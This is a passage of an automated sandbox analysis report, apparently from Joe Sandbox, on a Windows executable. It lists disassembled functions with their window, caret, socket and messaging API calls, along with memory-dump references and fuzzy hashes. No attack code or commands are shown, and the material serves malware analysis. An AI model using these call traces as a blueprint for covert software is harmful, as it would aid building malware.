                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0047439C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1792727568-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: cdecl
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850814276-3896280584
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0046D475
                                                                                                                                                                                                                                                                                                                                                                                                                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2502553879-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                                                                                                                                                                                                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 385091864-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1358664141-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
